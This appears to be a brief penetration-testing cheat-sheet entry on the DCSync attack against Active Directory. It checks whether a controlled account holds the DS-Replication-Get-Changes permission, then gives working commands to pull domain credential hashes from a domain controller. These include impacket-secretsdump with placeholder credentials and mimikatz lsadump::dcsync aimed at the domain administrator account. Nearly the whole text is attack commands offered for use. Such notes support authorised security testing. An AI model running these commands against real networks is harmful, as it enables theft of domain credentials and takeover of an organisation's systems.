Identify

Do you control and object with the DS-Replication-Get-Changes ACL?

Exploit

impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'

Remote

From windows

runas /netonly /user:DOMAIN\user powershell

local where “user” has the required ACL

.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator